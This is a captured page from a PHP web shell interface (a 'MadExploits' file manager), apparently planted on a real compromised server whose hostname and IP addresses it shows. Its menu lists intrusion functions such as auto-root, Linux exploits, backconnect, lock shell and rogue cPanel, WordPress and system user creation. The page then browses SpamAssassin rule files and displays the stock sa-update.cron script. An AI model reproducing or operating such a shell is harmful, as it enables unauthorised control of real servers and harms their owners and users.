Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
spamassassin /
[ HOME SHELL ]
Name
Size
Permission
Action
10_default_prefs.cf
8.56
KB
-rw-r--r--
10_hasbase.cf
2.39
KB
-rw-r--r--
20_advance_fee.cf
7.43
KB
-rw-r--r--
20_aux_tlds.cf
36.27
KB
-rw-r--r--
20_body_tests.cf
7.01
KB
-rw-r--r--
20_compensate.cf
1.85
KB
-rw-r--r--
20_dnsbl_tests.cf
11.62
KB
-rw-r--r--
20_drugs.cf
15.16
KB
-rw-r--r--
20_dynrdns.cf
11.11
KB
-rw-r--r--
20_fake_helo_tests.cf
8.83
KB
-rw-r--r--
20_freemail.cf
2.99
KB
-rw-r--r--
20_freemail_domains.cf
40.27
KB
-rw-r--r--
20_freemail_mailcom_domains.cf
4.31
KB
-rw-r--r--
20_head_tests.cf
26.3
KB
-rw-r--r--
20_html_tests.cf
10.44
KB
-rw-r--r--
20_imageinfo.cf
5.17
KB
-rw-r--r--
20_mailspike.cf
2.86
KB
-rw-r--r--
20_meta_tests.cf
3.37
KB
-rw-r--r--
20_net_tests.cf
1.83
KB
-rw-r--r--
20_pdfinfo.cf
15.45
KB
-rw-r--r--
20_phrases.cf
7.96
KB
-rw-r--r--
20_porn.cf
2.01
KB
-rw-r--r--
20_ratware.cf
16.43
KB
-rw-r--r--
20_uri_tests.cf
5.87
KB
-rw-r--r--
20_vbounce.cf
20.28
KB
-rw-r--r--
23_bayes.cf
2.94
KB
-rw-r--r--
25_accessdb.cf
1.51
KB
-rw-r--r--
25_antivirus.cf
1.5
KB
-rw-r--r--
25_asn.cf
1.93
KB
-rw-r--r--
25_dcc.cf
2.87
KB
-rw-r--r--
25_dkim.cf
5.11
KB
-rw-r--r--
25_dnswl.cf
2.97
KB
-rw-r--r--
25_pyzor.cf
1.47
KB
-rw-r--r--
25_razor2.cf
3.07
KB
-rw-r--r--
25_replace.cf
20.92
KB
-rw-r--r--
25_spf.cf
4.29
KB
-rw-r--r--
25_textcat.cf
1.73
KB
-rw-r--r--
25_uribl.cf
18.2
KB
-rw-r--r--
30_text_de.cf
26.44
KB
-rw-r--r--
30_text_fr.cf
19.95
KB
-rw-r--r--
30_text_it.cf
1.81
KB
-rw-r--r--
30_text_nl.cf
20.97
KB
-rw-r--r--
30_text_pl.cf
17.39
KB
-rw-r--r--
30_text_pt_br.cf
42.84
KB
-rw-r--r--
50_scores.cf
36.66
KB
-rw-r--r--
60_adsp_override_dkim.cf
9.12
KB
-rw-r--r--
60_awl.cf
1.29
KB
-rw-r--r--
60_bayes_stopwords.cf
15.98
KB
-rw-r--r--
60_shortcircuit.cf
2.27
KB
-rw-r--r--
60_txrep.cf
1.31
KB
-rw-r--r--
60_whitelist.cf
10.11
KB
-rw-r--r--
60_whitelist_auth.cf
75.4
KB
-rw-r--r--
60_whitelist_dkim.cf
6.36
KB
-rw-r--r--
60_whitelist_spf.cf
3.45
KB
-rw-r--r--
60_whitelist_subject.cf
1.87
KB
-rw-r--r--
72_active.cf
483.61
KB
-rw-r--r--
72_scores.cf
28.04
KB
-rw-r--r--
73_sandbox_manual_scores.cf
4.04
KB
-rw-r--r--
STATISTICS-set0-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set1-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set2-72_scores.cf.t...
0
B
-rw-r--r--
STATISTICS-set3-72_scores.cf.t...
0
B
-rw-r--r--
languages
99.1
KB
-rw-r--r--
local.cf
3.22
KB
-rw-r--r--
regression_tests.cf
2.71
KB
-rw-r--r--
sa-update-pubkey.txt
4.67
KB
-rw-r--r--
sa-update.cron
3.33
KB
-rwxr--r--
user_prefs.template
1.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sa-update.cron
#!/bin/bash # *** DO NOT MODIFY THIS FILE *** # # /etc/mail/spamassassin/channel.d/*.conf # Place files here to add custom channels. # # Proceed with sa-update if spam daemon is running or forced in /etc/sysconfig/sa-update unset SAUPDATE OPTIONS DEBUG NOTIFY_UPD [ -f /etc/sysconfig/sa-update ] && . /etc/sysconfig/sa-update [ "$SAUPDATE" = "no" ] && exit 0 for daemon in mimedefang spamd amavisd spampd; do /usr/bin/pgrep -f $daemon >& /dev/null [ $? -eq 0 ] && SAUPDATE=yes done # Skip sa-update if daemon not detected [ -z "$SAUPDATE" ] && exit 0 # sa-update must create keyring if [ ! -d /etc/mail/spamassassin/sa-update-keys ]; then sa-update fi # Initialize Channels and Keys CHANNELLIST="" KEYLIST="" # Process each channel defined in /etc/mail/spamassassin/channel.d/ for file in /etc/mail/spamassassin/channel.d/*.conf; do [ ! -f "$file" ] && continue # Validate config file PREFIXES="CHANNELURL KEYID BEGIN" for prefix in $PREFIXES; do if ! grep -q "$prefix" $file; then echo "ERROR: $file missing $prefix" exit 255 fi done . "$file" #echo "CHANNELURL=$CHANNELURL" #echo "KEYID=$KEYID" CHANNELLIST="$CHANNELLIST $CHANNELURL" KEYLIST="$KEYLIST $KEYID" sa-update --import "$file" done # Sleep random amount of time before proceeding to avoid overwhelming the servers sleep $(expr $RANDOM % 7200) unset arglist # Run sa-update on each channel, restart spam daemon if success for channel in $CHANNELLIST; do arglist="$arglist --channel $channel" done for keyid in $KEYLIST; do arglist="$arglist --gpgkey $keyid" done /usr/bin/sa-update $OPTIONS $arglist status=$? now=`date +"%d-%b-%Y %T"` # cron runs this script tee /var/log/sa-update.log # We want to always write to the log, but only send mail # as configured. if [ $status -eq 0 ]; then if [ -n "$DEBUG" -o -n "$NOTIFY_UPD" ]; then echo "$now: SpamAssassin: Update processed successfully" else echo "$now: SpamAssassin: Update processed successfully" >>/var/log/sa-update.log fi if [ -f /usr/bin/systemctl ]; then systemctl condrestart spamassassin.service >& /dev/null [ -f /usr/lib/systemd/system/amavisd.service ] && systemctl condrestart amavisd.service >& /dev/null systemctl --quiet is-active mimedefang.service; [ $? -eq 0 ] && systemctl reload mimedefang.service >& /dev/null [ -f /usr/lib/systemd/system/spampd.service ] && systemctl condrestart spampd.service >& /dev/null else service spamassassin condrestart >& /dev/null [ -f /etc/rc.d/init.d/amavisd ] && service amavisd-new condrestart >& /dev/null [ -f /etc/rc.d/init.d/mimedefang ] && service mimedefang condrestart >& /dev/null [ -f /etc/rc.d/init.d/spampd ] && service spampd condrestart >& /dev/null fi exit $status fi if [ $status -eq 1 ]; then if [ -n "$DEBUG" ]; then echo "$now: SpamAssassin: No update available" else echo "$now: SpamAssassin: No update available" >>/var/log/sa-update.log fi exit $status fi if [ $status -eq 2 ]; then echo "$now: SpamAssassin: Problem applying update - pre files failed lint check" exit $status fi if [ $status -eq 4 ]; then echo "$now: SpamAssassin: Update available, but download or extract failed" exit $status fi echo "$now: SpamAssassin: Unknown error code $status from sa-update" exit $status
Close